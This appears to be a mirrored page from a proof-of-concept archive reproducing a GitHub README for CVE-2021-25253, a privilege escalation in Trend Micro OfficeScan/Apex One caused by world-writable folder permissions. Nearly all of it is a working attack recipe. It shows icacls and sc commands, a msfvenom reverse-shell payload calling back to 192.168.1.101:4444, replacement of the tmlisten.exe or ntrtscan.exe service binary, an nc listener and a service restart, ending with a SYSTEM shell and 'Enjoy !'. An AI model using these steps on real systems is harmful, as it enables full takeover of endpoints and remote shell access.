Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-25253 PoC — Trend Micro Apex One 安全漏洞

Source
https://github.com/msd0pe-1/CVE-2021-25253
Associated Vulnerability
Title:Trend Micro Apex One 安全漏洞 (CVE-2021-25253)
Description:Trend Micro Apex One是美国趋势科技(Trend Micro)公司的一套能够提供自动威胁检测和响应功能的端点安全防护软件。 Trend Micro OfficeScan 存在安全漏洞,该漏洞源于趋势科技Apex One、趋势科技Apex One作为服务和防毒墙网络版XG SP1在该服务使用的资源上存在不适当的访问控制漏洞,可能会允许本地攻击者升级受影响的安装的权限。请注意:为了利用此漏洞,攻击者必须首先获得在目标系统上执行低特权代码的能力。
Readme
<a target="_blank" href="https://img.shields.io/badge/plateform-windows-blue.svg" rel="noopener noreferrer">
    <img src="https://img.shields.io/badge/plateform-windows-blue.svg">
</a>
<a target="_blank" href="https://img.shields.io/badge/version-10.0-yellow" rel="noopener noreferrer">
    <img src="https://img.shields.io/badge/version-10.0-yellow">
</a>
<a href="" rel="nofollow">
    <img src="https://img.shields.io/badge/service-acl-red">
</a>

```bash
#########################################################################
#                                                                       #
#  Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE  #
#  Date: 2023/05/04                                                     #
#  Exploit Author: msd0pe                                               #
#  Vendor Homepage: https://www.trendmicro.com                          #
#  My Github: https://github.com/msd0pe-1                               # 
#                                                                       # 
#########################################################################
```

<h3>Trend Micro OfficeScan Client:</h3>
Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.

<h2>Verify the folder rights:</h2>

```bash
    > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"

    C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                         NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                         NT AUTHORITY\SYSTEM:(F)
                                                         NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                         BUILTIN\Administrators:(F)
                                                         BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                         BUILTIN\Users:(F)
                                                         BUILTIN\Users:(OI)(CI)(IO)(F)
                                                         CREATOR OWNER:(OI)(CI)(IO)(F)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                         APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
```

<h2>Get informations about the services:</h2>

```bash
    > sc qc tmlisten

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: tmlisten
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT Listener
            DEPENDENCIES       : Netman
                               : WinMgmt
            SERVICE_START_NAME : LocalSystem
```

OR

```bash
    > sc qc ntrtscan

    SERVICE_NAME: ntrtscan
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : OfficeScan NT RealTime Scan
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
```

<h2>Generate a reverse shell:</h2>

```bash
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
 ```

OR

```bash
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe
```

<h2>Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe</h2>


<h2>Start listener</h2>

```bash
    > nc -lvp 4444
```

<h2>Reboot the service/server</h2>

```bash
    > sc stop tmlisten
    > sc start tmlisten
```
OR

```bash
    > sc stop ntrtscan
    > sc start ntrtscan
```

OR

```bash
    > shutdown /r
```

<h2>Enjoy !</h2>

```bash
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system
```
File Snapshot

 [4.0K]  /data/pocs/b659df18b3356a41e95e24384f335d7cfaa5c86c
├── [4.0K]  officescan_acl.txt
└── [4.6K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.